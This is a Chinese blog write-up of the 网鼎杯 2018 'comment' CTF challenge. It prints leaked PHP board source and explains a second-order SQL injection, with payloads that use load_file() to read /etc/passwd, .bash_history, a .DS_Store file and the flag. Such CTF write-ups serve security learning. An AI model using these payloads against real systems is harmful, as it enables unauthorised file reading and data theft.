网鼎杯 2018 comment

最新推荐文章于 2024-08-05 18:55:11 发布
最新推荐文章于 2024-08-05 18:55:11 发布
阅读量717 收藏 2
点赞数 1
分类专栏: SQL注入 泄露 Linux相关知识 文章标签: python mysql php linux web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/109389749
版权

知识点

  • 爆破弱密码
  • git泄露
  • 二次注入
  • .bash_history

WP

首先进入环境,是一个留言板的东西,而且按照题目描述的SQL,肯定又是SQL注入了。不过还不能直接留言,需要登录。登录就是爆破密码的后三位,爆出来是zhangwei666,然后登录。
如果提前用dirsearch扫了的话,会发现存在git泄露。利用工具弄下来,得到2个文件,那个关键的文件内容如下:

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id' ";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

经过代码审计,发现留言板有2个功能,1个相当于写主题,一个留言。write那个功能传入的参加都经过了addslashes,无法实现注入。但是发现comment里面从查询的结果里取出category,并没有进行addslashes,因此存在二次注入。
但是category的内容虽然没有被转义,但是它不是回显的内容,回显的是content。又考虑到插入的时候,语句是多行的,因此可以这样注入:

title=1&category=-1', content=(select database()),/*&content=1

在提交留言的时候,提交*/#,这样就成功闭合,而且将回显的内容放到了content里,实现了注入。
在这里插入图片描述
接下来就是漫长的注入。经过了一系列注入,发现flag并不在数据库了。。。
这时候要用到load_file()。自己也是很少用这个函数,因此这题就卡在这里了。我们可以用它来尝试读取文件:

title=1&category=-1', content=(select load_file('/etc/passwd')),/*&content=1

在这里插入图片描述
接下来又是一个知识盲区了。我们看到最后一行:

www:x:500:500:www:/home/www:/bin/bash

在这里插入图片描述
说明www用户可以登录bash。还有一个知识点,是.bash_history这个文件。
首先我们知道www用户的根目录是/home/www。
其次还有这个知识点:
在这里插入图片描述
其中.bash_history文件保存了当前用户使用过的历史命令。
以往读到的/etc/passwd都是除了root用户便没有别的用户了,这题突然多了个用户,而且根目录已知,肯定要尝试读一下这个文件,如果读到了:
在这里插入图片描述
首先是cd到了/tmp/目录,然后unzip了html.zip,然后又把这个.zip文件删除了。然后又把解压得到的html这个文件夹复制到了/var/www/下面,然后又cd到了/var/www/html下,将.DS_Store给删除,然后开启apache2服务。

因此,/tmp/下面的html文件夹里的.DS_Store并没有被删除。尝试读取:

title=1&category=-1', content=(select load_file('/tmp/html/.DS_Store')),/*&content=1

在这里插入图片描述
返回的内容不完全。因此要用hex(),一是因为.DS_Store里面有很多不可见字符,二是因为这题返回的内容不完全。

title=1&category=-1', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*&content=1

成功得到了内容:
在这里插入图片描述
再进行16进制解密:
在这里插入图片描述
发现了flag文件。接下来这题有坑,如果直接在/tmp/html下面读的话,flag是假的,要到/var/www/html下面取读:

title=1&category=-1', content=(select (load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*&content=1

然后查看源码,得到flag:
在这里插入图片描述

总结

这题自己只做到了load_file那里,首先就是对sql里面关于文件操作的内容不熟。
然后/etc/passwd里的内容到底是什么意思自己也是一知半解,然后就是.bash_history这个文件,自己也去根目录去试了,也发现了这个文件,果然还是对linux不了解。最后就是hex()的用法,自己还需要学习啊!

bfengj
关注
专栏目录
buu-[网鼎杯 2018]Comment
qaq517384的博客
10-13 317
进入题目 发帖时提示要登录,密码用bp跑出来是666 然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出 稍微试了一下,有问题的都发不出留言 在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露 githack载下来的源码跟没载一样 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./l
[网鼎杯 2018]Comment
Sk1y的博客
01-14 542
文章目录[CSCCTF 2019 Qual]FlaskLight解题过程payload1payload2payload3参考文章[RCTF2015]EasySQL解题过程payload参考文章[HITCON 2017]SSRFme解题过程payload参考文章[网鼎杯 2018]Comment解题过程payload参考文章 [CSCCTF 2019 Qual]FlaskLight 解题过程 f12中提示,GET方式传参search可以判断ssti 查看所有子类 ?search={{''.__class_
二次注入(2018网鼎杯comment
qq_64395221的博客
08-05 793
先进入/tmp目录,解压缩了html.zip文件(得到/tmp/html),之后将html.zip删除了,拷贝了一份html给了/var/www目录(得到/var/www/html),之后将/var/www/html下的.DS_Store文件删除,但是/tmp/html下的.DS_Store文件没有删除,查看一下,然后因为这种文件直接读取通常存在乱码,所以要转进制读取才行。/*是php的注释符,将后边的引号注释掉。在评论区提交*/#,/**/形成闭合后,将content注释掉了,同时也绕过了引号。
网鼎杯2020朱雀组-web
ChenZIDu的博客
05-18 3037
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
comment hive_Hive中基本语法
weixin_39676021的博客
02-01 2904
1.Hive中数据库基本操作1.1 Create/Drop/Alter/Use Database```CREATE (DATABASE|SCHEMA) [IF NOT EXISTS] database_name[COMMENT database_comment][LOCATION hdfs_path][WITH DBPROPERTIES (property_name=property_value,...
pgsql之Comment命令
深海微澜
11-01 5043
参考 Comment命令:定义或者改变一个对象的评注 语法: COMMENT ON { TABLE object_name | COLUMN table_name.column_name | AGGREGATE agg_name (agg_type [, ...] ) | CAST (sourcetype AS targettype) | CONSTRAINT cons...
慕课网数据库
张晨光老师的播客
02-28 2170
javaEE慕课网数据库 /* Navicat MySQL Data Transfer Source Server : localhost_3306 Source Server Version : 50717 Source Host : localhost:3306 Source Database : mooc Target Server ...
网鼎杯-第三场-加解密-hafuhafu
08-27
2018年8月27日网鼎杯|第三场|加解密|
网鼎杯-第三场-加解密-hafuhafu正确版
08-27
2018年8月27日网鼎杯|第三场|加解密
BUUCTF之[网鼎杯 2018]Comment
m0_62107966的博客
09-15 986
BUUCTF之[网鼎杯 2018]Comment 输入:*/# sql语句是换行的,所以我们无法用 单行注释符,必须用/**/拼接,用#闭合sql语句使其执行。可以看到执行成功,返回ctf这个库。首先发帖的时候必须登录,爆破弱密码登录,得到666是满足的后三位密码的。是一个类似留言板的界面,考虑二次注入,并且有git源码泄露。接下来尝试sql语句注入都失败了,看了大佬的wp,用sql来读取文件。在cmment中,对于category的值从数据库取出来没有进行转义
网鼎杯2018 comment
weixin_44377940的博客
03-20 2285
本次知识点 git恢复文件 二次注入 git恢复文件 如何判断是否可以恢复? 看是否有commit文件,如果没有,则需要恢复,像这题: 可以看到,
[网鼎杯 2018]Comment题解,超详细!
2202_75361164的博客
10-23 673
【代码】[网鼎杯 2018]Comment题解,超详细!思路加payload
mysql comment
最新发布
09-11
MySQL中,`COMMENT`是一个用于添加注释的特性。它允许用户为数据库对象,如表、列、索引、触发器或存储过程等,提供额外的文字描述信息。这些注释不会影响数据本身,而是作为对数据库结构和逻辑的一种文档记录,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值